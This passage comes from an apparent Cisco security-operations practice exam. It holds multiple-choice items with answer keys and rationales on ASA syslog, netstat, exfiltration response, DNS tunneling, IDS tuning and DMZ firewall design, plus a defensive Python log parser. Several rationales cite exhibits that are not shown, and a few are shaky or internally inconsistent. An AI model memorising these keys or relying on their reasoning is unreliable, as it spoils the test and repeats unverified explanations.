The syslog message shows a deny action for an HTTP connection (port 80) from an external IP (outside) to an internal IP (inside). The '%ASA-4-106023' message indicates a packet was denied by the firewall's access control list (ACL). This matches the scenario of an attempted external-to-internal web connection being blocked, which is option C.

Exam trap

Cisco often tests the ability to distinguish between different syslog message IDs (e.g., 106023 for ACL denies vs. 305006 for NAT failures) and to correctly interpret the 'Deny' keyword as a block, not a successful connection.

How to eliminate wrong answers

Option A is wrong because the syslog explicitly says 'Deny', not 'Allow', so a successful HTTP connection is not indicated. Option B is wrong because VPN tunnel initiation failures are typically logged with different syslog IDs (e.g., 713228 for IKE failure) and involve authentication or phase-1/phase-2 errors, not a simple TCP deny on port 80. Option D is wrong because NAT translation failures generate syslog messages like '%ASA-3-305006' for 'no translation group found', not a deny action on a specific port/protocol.
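Since the exhibit is not reproduced here, the following added Python example (not code from the original page) shows how an analyst parses the message IDs this question turns on. It splits the ASA syslog envelope (%ASA-severity-id), extracts every field of a 106023 ACL deny including the ICMP variant, and maps a few neighbouring IDs to their meaning. The three log lines are constructed in the documented ASA formats; the addresses, connection number and ACL name are placeholders.

```python
import re
from typing import Optional

# Envelope shared by every ASA syslog line: %ASA-<severity>-<message id>: <text>
ASA_ENVELOPE = re.compile(r"%ASA-(?P<severity>\d)-(?P<msg_id>\d{6}): (?P<text>.*)")

# 106023: packet denied by an ACL. TCP/UDP lines carry ports; ICMP lines carry type/code instead.
ACL_DENY = re.compile(
    r"Deny (?P<proto>\w+) src (?P<src_if>[\w-]+):(?P<src_ip>[\d.]+)(?:/(?P<src_port>\d+))? "
    r"dst (?P<dst_if>[\w-]+):(?P<dst_ip>[\d.]+)(?:/(?P<dst_port>\d+))?"
    r"(?: \(type (?P<icmp_type>\d+), code (?P<icmp_code>\d+)\))?"
    r" by access-group \"(?P<acl>[^\"]+)\""
)

# Meaning of a few IDs an analyst meets constantly; extend as needed.
KNOWN_IDS = {
    "106023": "packet denied by access-list",
    "302013": "inbound TCP connection built (permitted)",
    "305006": "NAT translation creation failed",
}


def parse_asa(line: str) -> Optional[dict]:
    """Turn one ASA syslog line into a dict; 106023 lines get full field extraction."""
    env = ASA_ENVELOPE.search(line)
    if not env:
        return None
    record = {
        "severity": int(env["severity"]),
        "msg_id": env["msg_id"],
        "meaning": KNOWN_IDS.get(env["msg_id"], "unmapped message id"),
        "action": None,
    }
    if env["msg_id"] == "106023":
        m = ACL_DENY.search(env["text"])
        if m:
            record.update({k: v for k, v in m.groupdict().items() if v is not None})
            record["action"] = "deny"
            record["direction"] = f"{m['src_if']}->{m['dst_if']}"
    elif env["msg_id"] == "302013":
        record["action"] = "allow"
    return record


def describe(record: dict) -> str:
    """One-line analyst summary of the kind the question asks for."""
    if record.get("action") == "deny":
        service = record.get("dst_port", "icmp")
        return (f"{record['proto']} from {record['src_ip']} ({record['src_if']}) to "
                f"{record['dst_ip']}:{service} ({record['dst_if']}) denied by ACL {record['acl']}")
    return f"{record['msg_id']}: {record['meaning']}"


# Constructed lines in the documented ASA formats (assumed values, not the page's exhibit).
SAMPLE_LINES = [
    '%ASA-4-106023: Deny tcp src outside:203.0.113.5/51234 dst inside:10.1.1.1/80 '
    'by access-group "outside_in" [0x0, 0x0]',
    '%ASA-4-106023: Deny icmp src outside:203.0.113.5 dst inside:10.1.1.1 (type 8, code 0) '
    'by access-group "outside_in" [0x0, 0x0]',
    '%ASA-6-302013: Built inbound TCP connection 4711 for outside:203.0.113.9/40000 '
    '(203.0.113.9/40000) to inside:10.1.1.1/80 (10.1.1.1/80)',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(describe(parse_asa(line)))
```

The first constructed line is exactly the situation in option C: a deny from the outside interface to an inside host on TCP/80, attributed to a named access-group. The 302013 line shows why the keyword matters: a permitted inbound web connection is a different message ID entirely, not a 106023 with a different verb.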

57
MCQeasy

A security analyst is investigating a suspected malware infection on a Windows host. The analyst wants to identify processes that have network connections. Which built-in Windows tool should the analyst use?

A.netstat
B.ipconfig
C.tasklist
D.nslookup
AnswerA

netstat shows active connections and listening ports with associated process IDs.

Why this answer

Netstat (network statistics) is the correct built-in Windows tool for displaying active TCP and UDP connections, listening ports, and the associated process IDs (PIDs). Running netstat with the -o flag (commonly as netstat -ano) adds the owning PID to each line, which can then be matched against tasklist output; the -b flag prints the executable name directly but requires an elevated prompt. This mapping from connection to process is essential for identifying suspicious processes communicating over the network.

Exam trap

Cisco often tests the distinction between tools that show process lists (tasklist) and tools that show network connections (netstat), trapping candidates who confuse 'process enumeration' with 'network connection enumeration'.

How to eliminate wrong answers

Option B (ipconfig) is wrong because it displays IP configuration details such as IP address, subnet mask, and default gateway, but it does not show active network connections or the processes using them. Option C (tasklist) is wrong because it lists running processes and their memory usage, but it does not reveal which processes have open network sockets or connections. Option D (nslookup) is wrong because it is a DNS query tool used to resolve domain names to IP addresses or perform reverse lookups, and it provides no information about local processes or their network connections.

58
MCQmedium

You are an analyst in a SOC that monitors a retail company with multiple branch offices. The company uses VPN connections between branches. The SIEM reports that a branch office router (IP 10.99.0.1) has been sending large amounts of data to an external IP 185.220.101.10 on port 123 (NTP) during off-hours. The NTP traffic is abnormal because the branch uses a local time server. The amount of data sent is 2 GB over 8 hours. The router logs show normal administrative traffic. The branch manager reports no issues. You check threat intelligence and find that 185.220.101.10 is a known malicious IP associated with data exfiltration. What should be your immediate response?

A.Disable NTP service on the branch router
B.Notify the CISO and wait for further instructions
C.Block the external IP 185.220.101.10 on the firewall and initiate incident response for the router
D.Contact the branch manager to confirm if any scheduled backups are running
AnswerC

Blocking the IP stops the exfiltration, and investigating the router determines if it is compromised.

Why this answer

Option C is correct because the branch router is sending 2 GB of NTP traffic to a known malicious IP (185.220.101.10) during off-hours, which is a strong indicator of data exfiltration using NTP (often via tunneling or covert channels). The immediate response should be to block the external IP on the firewall to stop the data flow and initiate incident response to investigate the compromised router, as the traffic is abnormal (branch uses a local time server) and the IP is associated with exfiltration.

Exam trap

Cisco often tests the candidate's ability to prioritize immediate containment (blocking the malicious IP) over administrative or investigative delays, and the trap here is that candidates may choose to disable the service (Option A) without realizing that the exfiltration is already in progress and must be stopped at the network level first.

How to eliminate wrong answers

Option A is wrong because disabling NTP service on the branch router would not stop the ongoing exfiltration (the traffic is already being sent to the malicious IP) and could disrupt legitimate time synchronization if the local time server fails; the priority is to block the external communication. Option B is wrong because notifying the CISO and waiting for further instructions delays the immediate containment action required to stop data exfiltration, violating the SOC's duty to mitigate active threats. Option D is wrong because contacting the branch manager to confirm scheduled backups is irrelevant—backups would not use NTP port 123 to send 2 GB of data to a known malicious IP, and this action wastes time during an active security incident.

59
MCQhard

Refer to the exhibit. A security analyst is reviewing the ASA configuration. Which traffic will be permitted from the outside interface?

A.Any IP traffic to host 10.1.1.1
B.All traffic from the outside to the inside network
C.TCP traffic to host 10.1.1.1 on port 80
D.HTTP traffic from internal hosts to the outside
AnswerC

The first ACL line permits TCP to 10.1.1.1 port 80.

Why this answer

The correct answer is C because the ASA configuration shown includes an access-list entry that permits TCP traffic from any source to host 10.1.1.1 on port 80. This is the only rule that explicitly allows traffic from the outside interface to the inside network, and since the outside interface has the access-group applied inbound, only traffic matching this permit statement will be allowed.

Exam trap

Cisco often tests the distinction between 'any IP traffic' and 'any TCP traffic' — the trap here is that candidates may assume 'permit tcp any host 10.1.1.1 eq 80' allows all IP traffic to that host, but it strictly permits only TCP with destination port 80.

How to eliminate wrong answers

Option A is wrong because the access-list permits only TCP traffic to host 10.1.1.1, not any IP traffic (which would include UDP, ICMP, etc.). Option B is wrong because the access-list does not permit all traffic from outside to inside; it only permits TCP traffic to a specific host on a specific port. Option D is wrong because the question asks about traffic permitted from the outside interface, not traffic originating from internal hosts; HTTP traffic from internal hosts to the outside would be evaluated by a different access-list applied to the inside interface or by stateful inspection rules.

60
MCQmedium

An incident response plan specifies that containment must be completed before eradication. A security analyst identifies a malware infection on a critical server. What should be done first?

A.Disconnect the server from the network
B.Run antivirus scans
C.Notify law enforcement
D.Reinstall the operating system
AnswerA

Disconnecting is a containment action that prevents further spread.

Why this answer

According to the incident response plan, containment must be completed before eradication. Disconnecting the server from the network (Option A) is the immediate containment action that prevents the malware from spreading laterally to other hosts, preserving the integrity of the network and allowing for forensic analysis. This step aligns with the NIST SP 800-61 incident response lifecycle, where containment is prioritized to limit damage before any eradication or recovery steps are taken.

Exam trap

Cisco often tests the strict ordering of the incident response phases (Preparation, Detection & Analysis, Containment, Eradication, Recovery, Post-Incident Activity), and the trap here is that candidates confuse eradication actions (like running antivirus or reinstalling the OS) with the required first containment step, leading them to choose a technically plausible but procedurally incorrect answer.

How to eliminate wrong answers

Option B is wrong because running antivirus scans is an eradication or detection step, not a containment action; performing scans before containment could alert the malware or cause it to spread further. Option C is wrong because notifying law enforcement is a post-containment notification step that occurs after the scope of the incident is understood and evidence is preserved, not the first action. Option D is wrong because reinstalling the operating system is a recovery/eradication step that should only occur after containment is complete and forensic evidence has been collected; doing so first would destroy volatile data and potentially violate chain of custody.

61
Multi-Selectmedium

Which THREE indicators are commonly found in network traffic that suggest a host is part of a botnet? (Choose three.)

Select 3 answers
A.Connections to known IRC servers on non-standard ports
B.Large file downloads from external servers
C.Periodic connections to IP addresses with poor reputation
D.High volumes of outbound traffic to multiple destinations
E.Frequent DNS queries to legitimate corporate DNS servers
AnswersA, C, D

IRC is a common C2 channel.

Why this answer

Option A is correct because botnets often use IRC (Internet Relay Chat) for command and control (C2) communication. Attackers configure IRC servers on non-standard ports (e.g., TCP 6667–6669 are common, but botnets may use ports like 8080, 8443, or random high ports) to evade detection by security tools that monitor default IRC ports. The presence of persistent IRC connections to unusual ports is a strong indicator of botnet activity.

Exam trap

Cisco often tests the distinction between normal network behavior (like large downloads or frequent DNS queries) and specific botnet indicators (IRC on non-standard ports, connections to low-reputation IPs, and asymmetric outbound traffic patterns), trapping candidates who confuse generic high-bandwidth activity with botnet C2 signatures.

62
Multi-Selecteasy

Which TWO are examples of technical security controls? (Select two.)

Select 2 answers
A.Firewall
B.Security policy
C.Security awareness training
D.Background checks
E.Encryption
AnswersA, E

Firewalls are technical controls that filter network traffic.

Why this answer

A firewall is a technical security control because it is a hardware or software device that enforces access policies by inspecting network traffic based on rules (e.g., permit/deny IP addresses, ports, protocols). Encryption is a technical control that transforms plaintext data into ciphertext using algorithms like AES-256 or RSA, ensuring confidentiality during storage or transmission. Both are implemented through technology rather than administrative or physical means.

Exam trap

Cisco often tests the distinction between administrative, physical, and technical controls, and the trap here is that candidates confuse a security policy (a document) or training (a human process) with a technical control, because they are all part of a defense-in-depth strategy.

63
MCQeasy

Based on the exhibit, which host is likely engaged in data exfiltration?

A.10.0.0.1
B.10.0.0.3
C.10.0.0.2
D.None of the above
AnswerA

This host has large volumes of data to external web servers.

Why this answer

Host 10.0.0.1 is likely engaged in data exfiltration because the exhibit shows a large volume of outbound TCP traffic from this IP to an external destination on port 443 (HTTPS), with a significantly higher byte count compared to other hosts. This pattern is consistent with data being encrypted and sent to an external server, a common exfiltration technique to bypass inspection.

Exam trap

Cisco often tests the concept that data exfiltration is indicated by a high volume of outbound traffic to an external destination, especially over encrypted channels, and the trap here is that candidates may overlook the byte count asymmetry and focus only on the destination port or protocol, missing the key behavioral indicator.

How to eliminate wrong answers

Option B (10.0.0.3) is wrong because its traffic pattern shows a balanced exchange of packets with internal hosts, typical of normal internal communication, not exfiltration. Option C (10.0.0.2) is wrong because its outbound traffic volume is low and primarily to internal IPs, indicating routine operations rather than data theft. Option D (None of the above) is wrong because the exhibit clearly identifies 10.0.0.1 as the host with anomalous outbound data volume, making it the correct choice.

64
MCQhard

A Cisco Firepower sensor is generating a high number of false positives from a rule that triggers on large ICMP packets. The analyst suspects the rule threshold is too low. Which tuning action most effectively reduces false positives while maintaining detection of actual attacks?

A.Change the rule action from alert to drop.
B.Disable the rule entirely.
C.Add an exception for trusted source IPs.
D.Increase the packet size threshold.
AnswerD

This directly addresses the cause of false positives without disabling detection.

Why this answer

Increasing the packet size threshold (Option D) directly addresses the root cause of the false positives: the rule is triggering on legitimate large ICMP packets that are below the actual attack size. By raising the threshold to a value that still captures known attack vectors (e.g., ICMP echo requests exceeding 65,535 bytes in a fragmented attack), the sensor reduces noise while preserving detection of true malicious oversized packets. This is the most effective tuning action because it adjusts the detection parameter without disabling or bypassing the rule.

Exam trap

Cisco often tests the misconception that changing the rule action (e.g., to drop) or adding exceptions is the best way to reduce false positives, when in fact the most precise and effective method is to adjust the detection threshold parameter that is causing the false positives.

How to eliminate wrong answers

Option A is wrong because changing the rule action from alert to drop would still generate false positives (the rule would still match and drop legitimate traffic), potentially causing denial of service for valid large ICMP packets, and does not reduce the false positive rate. Option B is wrong because disabling the rule entirely eliminates detection of all oversized ICMP attacks, leaving the network vulnerable to actual threats such as ICMP fragmentation or ping-of-death attacks. Option C is wrong because adding an exception for trusted source IPs only reduces false positives from those specific sources; it does not address the underlying threshold issue and may miss attacks originating from trusted IPs that have been compromised.

65
MCQmedium

A host is infected with malware that uses DNS tunneling to exfiltrate data. Which type of analysis would best detect this activity?

A.DNS log analysis
B.Windows event log analysis
C.Firewall log analysis
D.NetFlow analysis
AnswerA

DNS logs show query names, sizes, and frequency.

Why this answer

DNS tunneling encodes exfiltrated data within DNS queries or responses, often using TXT or A record types to bypass network security controls. DNS log analysis is the most direct detection method because it reveals anomalous patterns such as unusually long domain names, excessive NXDOMAIN responses, or high volumes of DNS traffic to a single external server, which are hallmarks of tunneling activity.

Exam trap

Cisco often tests the misconception that firewall logs or NetFlow are sufficient for detecting application-layer tunneling, when in fact only DNS-specific logs provide the granularity to see the encoded payloads within DNS queries.

How to eliminate wrong answers

Option B is wrong because Windows event log analysis focuses on system-level events (e.g., process creation, user logins) and does not capture network-layer DNS traffic, so it would miss the outbound data exfiltration. Option C is wrong because firewall logs typically record IP addresses, ports, and protocols but lack the DNS query/response payload details needed to detect the encoded data within DNS messages. Option D is wrong because NetFlow analysis provides metadata (source/destination IP, bytes transferred) but does not inspect the content of DNS packets, making it unable to identify the tunneling pattern or the data being exfiltrated.

66
MCQhard

Refer to the exhibit. A network administrator notices that remote SSH logins to the router succeed, but the router is not sending accounting records. Based on the configuration, what is the most likely cause?

A.The AAA authorization method is set to local, not TACACS+.
B.The TACACS+ server key is not configured correctly.
C.The AAA authentication method uses local database instead of TACACS+.
D.The accounting command references a TACACS+ group that is not defined.
AnswerD

The group 'tacacs+' is not defined; only a server is configured.

Why this answer

The correct answer is D because the `accounting exec default` command references a TACACS+ server group named 'tacacs_server_group' that is not defined in the configuration. Without a defined server group, the router cannot send accounting records to any TACACS+ server, even though SSH authentication succeeds via the local database.

Exam trap

Cisco often tests the distinction between authentication, authorization, and accounting (AAA) components, and the trap here is that candidates assume a working authentication implies accounting is also functional, overlooking that accounting requires a correctly defined and referenced server group.

How to eliminate wrong answers

Option A is wrong because the AAA authorization method is not the issue; authorization controls what commands or services a user can execute, not whether accounting records are sent. Option B is wrong because the TACACS+ server key is configured correctly with the `key cisco123` command under the TACACS+ server definition, so key mismatch is not the cause. Option C is wrong because the AAA authentication method uses the local database for login, which allows SSH access to succeed, but accounting is independent of authentication; the problem is that the accounting method references an undefined server group, not that authentication uses local.

67
Multi-Selecthard

An analyst is investigating an alert triggered by a Snort rule that matches traffic on port 445 (SMB). The analyst sees that the signature has a high false positive rate. Which THREE factors should the analyst evaluate to tune the signature for better accuracy? (Choose three.)

Select 3 answers
A.Implementing a behavioral analysis heuristic to detect anomalous SMB activity.
B.Disabling the rule to eliminate false positives.
C.Creating a rule exception for internal subnets that use SMB for file sharing.
D.Adjusting the detection threshold to only alert when a certain number of SMB events occur within a time window.
E.Adding specific destination IP addresses of legitimate SMB servers.
AnswersC, D, E

Exceptions for known benign traffic improve accuracy.

Why this answer

Option C is correct because creating a rule exception for internal subnets that legitimately use SMB for file sharing reduces false positives by excluding known benign traffic. This allows the Snort rule to focus on external or anomalous SMB traffic on port 445, improving detection accuracy without disabling the rule entirely.

Exam trap

Cisco often tests the distinction between tuning an existing signature (e.g., adding exceptions or thresholds) versus implementing entirely new detection methods (e.g., behavioral analysis), which leads candidates to mistakenly select options that propose changing the detection approach rather than refining the rule.

68
MCQhard

A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?

A.Place both servers on the internal network with host-based firewalls
B.Place the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from DMZ to internal
C.Use a VPN between the web server and database server
D.Place both servers on the same VLAN with a firewall between them
AnswerB

DMZ isolates web server; blocking outbound from DMZ prevents pivot.

Why this answer

Placing the web server in a DMZ and the database server on the internal network, with a firewall blocking outbound traffic from the DMZ to internal, prevents an attacker who compromises the web server from initiating connections to the internal database server. This implements a default-deny rule for DMZ-to-internal traffic, forcing all database access to be initiated from the internal network only, which breaks the pivot chain. The DMZ acts as a buffer zone, isolating publicly accessible services from sensitive internal resources.

Exam trap

Cisco often tests the misconception that host-based firewalls or VLANs alone provide sufficient segmentation, when in fact network-level DMZ isolation with explicit direction-based firewall rules is required to prevent lateral movement after a perimeter breach.

How to eliminate wrong answers

Option A is wrong because placing both servers on the internal network with host-based firewalls still allows the compromised web server to directly reach the database server if the host firewall is misconfigured or bypassed, and it lacks network-level segmentation to prevent lateral movement. Option C is wrong because a VPN between the web server and database server encrypts traffic but does not restrict the direction of connection initiation; an attacker on the web server could still use the VPN tunnel to pivot to the database server. Option D is wrong because placing both servers on the same VLAN with a firewall between them still permits Layer 2 adjacency and potential ARP spoofing or VLAN hopping attacks, and the firewall would need to inspect all traffic, which is less effective than true network segmentation with a DMZ.

69
Multi-Selecteasy

Which two are best practices for deploying network-based intrusion detection systems? (Choose two.)

Select 2 answers
A.Place sensors behind firewalls to reduce false positives.
B.Enable all signatures to maximize detection.
C.Use tap or SPAN ports to ensure traffic visibility.
D.Use inline mode for all sensors to enable blocking.
E.Deploy sensors at network choke points.
AnswersC, E

Passive monitoring avoids impacting network performance.

Why this answer

Options C and E are correct. Deploying sensors at network choke points ensures visibility of all traffic, and using tap or SPAN ports allows passive monitoring without introducing latency or failure points. Option A is not a best practice because placing sensors behind firewalls may miss attacks that never get past the firewall.

Option D is not always appropriate, as inline mode can introduce latency and is not required for detection. Option B would generate excessive false positives.

70
MCQmedium

You are a cybersecurity analyst in a SOC. The company uses a combination of Snort NIDS and Windows Event Log monitoring. At 3:00 PM, you receive a critical alert: 'ET TROJAN Observed Malicious SSL Certificate (Fake Google)'. The alert shows that a workstation (IP 10.0.1.45) initiated an SSL connection to IP 192.0.2.10 on port 443. The certificate presented by the server is self-signed and claims to be 'google.com'. The destination IP is not in any known Google IP range. You check the firewall logs and see that the outbound connection was allowed. The workstation's host logs show that the user is a marketing employee who frequently accesses webmail. The user reports no unusual behavior. You also check the company's web proxy logs and see that the user accessed 'http://www.google.com' earlier today, but the SSL connection is to a different IP. What should be your next step?

A.Ignore the alert because the user is unaware of any issue
B.Isolate the workstation from the network and perform a forensic analysis
C.Wait and monitor the workstation for further alerts before taking action
D.Block the destination IP 192.0.2.10 on the firewall
AnswerB

Isolating the workstation prevents further damage, and forensic analysis can determine the root cause and scope of compromise.

Why this answer

The alert indicates a potential man-in-the-middle (MITM) attack or malware using a self-signed SSL certificate impersonating google.com. Isolating the workstation is critical to prevent lateral movement or data exfiltration while preserving evidence for forensic analysis. The combination of Snort NIDS detecting the malicious certificate and the connection to an unknown IP (192.0.2.10) strongly suggests compromise, regardless of user reports.

Exam trap

Cisco often tests the principle that user reports of 'no unusual behavior' are unreliable in incident response, and that immediate containment (isolation) takes precedence over monitoring or partial blocking.

How to eliminate wrong answers

Option A is wrong because ignoring the alert based solely on user denial is a security risk; users are often unaware of silent compromise (e.g., malware or MITM). Option C is wrong because waiting for further alerts could allow the attacker to exfiltrate data or pivot to other hosts; immediate containment is required. Option D is wrong because blocking the destination IP alone does not address the potential compromise of the workstation; the attacker could use other IPs or the malware may already be active locally.

71
MCQeasy

A security analyst reviews the firewall log. What is the most likely reason for the denied connection?

A.The destination port is blocked by default
B.The source IP address is an external threat
C.The destination IP is a known malicious host
D.The access control list does not permit the traffic
AnswerD

Denied by access-group indicates ACL blocking.

Why this answer

The firewall log shows a denied connection, and the most likely reason is that the access control list (ACL) does not permit the traffic. Firewalls enforce security policies by evaluating traffic against ACL rules; if no rule explicitly allows the packet (based on source/destination IP, port, and protocol), the implicit deny at the end of the ACL drops the connection. This is the default behavior for stateful firewalls and is the most common cause of denied connections in logs.

Exam trap

Cisco often tests the concept that the implicit deny at the end of an ACL is the most common reason for denied traffic, tempting candidates to overthink with threat-based answers like external IPs or malicious hosts.

How to eliminate wrong answers

Option A is wrong because destination ports are not 'blocked by default' in a generic sense; firewalls block traffic based on ACL rules, not a default port blocklist, and many ports (e.g., 80, 443) are often permitted unless explicitly denied. Option B is wrong because the source IP being an external threat is a specific threat intelligence match, not the most likely reason for a denied connection; firewalls deny traffic primarily due to ACL mismatches, not because of external threat lists unless a rule explicitly references them. Option C is wrong because the destination IP being a known malicious host would require the firewall to have a threat intelligence feed or a specific block rule; without such a rule, the firewall would not deny traffic based solely on reputation, and the log entry would typically indicate a threat block, not a generic ACL deny.

72
MCQmedium

During a change management process, a security administrator approves a firewall rule change. After implementation, a critical application becomes unreachable. Which step in the change process was likely missed?

A.Post-implementation documentation
B.Backout plan development
C.Testing in a staging environment
D.Peer review of the change
AnswerB

Without a backout plan, reverting changes is delayed.

Why this answer

A thorough backout plan should be prepared before change implementation so that if issues occur, the change can be reversed. Option B is correct. Option D (peer review) helps but is not the direct cause.

Option C (testing) might have been done but is not the immediate issue. Option A (documentation) is important but not the direct cause of unreachability.

73
MCQhard

A security analyst for a medium-sized enterprise is monitoring the network using Cisco Stealthwatch. They notice a sudden spike in traffic originating from an internal host (IP 10.10.10.50) communicating with multiple external IP addresses on port 445 (SMB). The host is a Windows server that typically serves web applications on ports 80 and 443. The analyst checks the host's firewall logs and finds that Windows Firewall is disabled. The host's antivirus is up to date and no alerts were triggered. The traffic pattern shows multiple connection attempts to /24 subnets across the internet, each with a single packet per destination. Based on this behavior, what is the most likely issue?

A.The host is infected with malware that is performing network reconnaissance.
B.The host is part of a distributed vulnerability scanning initiative.
C.The host is being used for a DDoS amplification attack.
D.The host is legitimately scanning the internet for outdated SMB shares.
AnswerA

The pattern matches malware scanning for SMB vulnerabilities (e.g., EternalBlue).

Why this answer

The traffic pattern—multiple connection attempts to /24 subnets across the internet, each with a single packet per destination—is classic behavior for network reconnaissance, specifically scanning for open SMB ports. The host's Windows Firewall being disabled and the lack of antivirus alerts indicate that the host is likely compromised and running malware that is performing this reconnaissance, as legitimate scanning or DDoS amplification would not exhibit this single-packet-per-destination pattern.

Exam trap

Cisco often tests the distinction between reconnaissance (scanning) and attack (exploitation/DDoS), where candidates may confuse the single-packet scanning pattern with DDoS amplification or legitimate scanning, but the key is the lack of handshake completion and the disabled firewall indicating compromise.

How to eliminate wrong answers

Option B is wrong because a distributed vulnerability scanning initiative would typically be coordinated and authorized, with consistent scanning patterns and proper logging, not originating from a single host with a disabled firewall and no alerts. Option C is wrong because a DDoS amplification attack would involve sending small queries to reflectors that then send large responses to a victim, not the host itself making single-packet connections to multiple destinations on port 445. Option D is wrong because legitimate scanning of the internet for outdated SMB shares would be authorized and would not occur from a web server with a disabled firewall and no antivirus alerts; such activity is almost always malicious.

74
Multi-Selectmedium

Which TWO of the following are best practices when configuring a SIEM for security monitoring?

Select 2 answers
A.Tune rules to reduce false positives.
B.Disable logging for low-security systems.
C.Prioritize alerts based on risk.
D.Use the same log source for all event types.
E.Enable all default correlation rules.
AnswersA, C

Tuning improves alert accuracy and reduces noise.

Why this answer

Tuning SIEM rules to reduce false positives is a best practice because it improves the signal-to-noise ratio, ensuring that security analysts focus on genuine threats rather than being overwhelmed by irrelevant alerts. By adjusting thresholds, whitelisting known benign activity, or refining correlation logic, the SIEM becomes more efficient and reduces alert fatigue, which is critical for effective security monitoring.

Exam trap

Cisco often tests the misconception that more logging or more rules always equals better security, when in fact untuned defaults and excessive logging degrade monitoring effectiveness and increase operational burden.

75
MCQhard

You are a security analyst for a medium-sized enterprise. The network includes a DMZ with a web server (10.0.1.10) and a database server (10.0.2.10) in the internal network. Users access the web server via HTTPS from the internet. The web server queries the database server on TCP 3306. Recently, users reported that the web application sometimes returns database errors. You review firewall logs and see the following:

- Allowed inbound HTTPS to 10.0.1.10 from various external IPs.
- Denied outbound from 10.0.1.10 to 10.0.2.10 on port 3306.
- Allowed outbound from 10.0.1.10 to external IPs on port 443.

You also notice that the web server's outbound traffic to the database server is being blocked. The firewall has a default deny rule. Which action should you take to restore normal operation while maintaining security?

A.Create a rule allowing inbound traffic on TCP 3306 to the database server from any source.
B.Move the database server to the DMZ to avoid firewall restrictions.
C.Create a rule allowing all outbound traffic from the DMZ to the internal network.
D.Create a rule allowing outbound traffic from the web server IP (10.0.1.10) to the database server IP (10.0.2.10) on TCP 3306.
AnswerD

This specifically allows the needed traffic while minimizing exposure.

Why this answer

The firewall logs show that outbound traffic from the web server (10.0.1.10) to the database server (10.0.2.10) on TCP 3306 is being denied, which causes the database errors. Since the web server initiates the connection to the database, a rule allowing this specific outbound traffic from the web server to the database server on port 3306 restores functionality while maintaining the default-deny posture. This is the most secure approach because it permits only the necessary traffic between the two specific hosts and port, without opening broader access.

Exam trap

Cisco often tests the misconception that you need an inbound rule for the database server when the traffic is actually initiated from the web server outbound, leading candidates to choose Option A or C.

How to eliminate wrong answers

Option A is wrong because allowing inbound traffic on TCP 3306 to the database server from any source would expose the database directly to the internet, bypassing the web server and creating a severe security risk. Option B is wrong because moving the database server to the DMZ would expose it to the same network segment as the web server and potentially the internet, increasing the attack surface and violating the principle of defense in depth. Option C is wrong because allowing all outbound traffic from the DMZ to the internal network would permit any DMZ host to reach any internal host on any port, which is overly permissive and could enable lateral movement by an attacker who compromises a DMZ device.
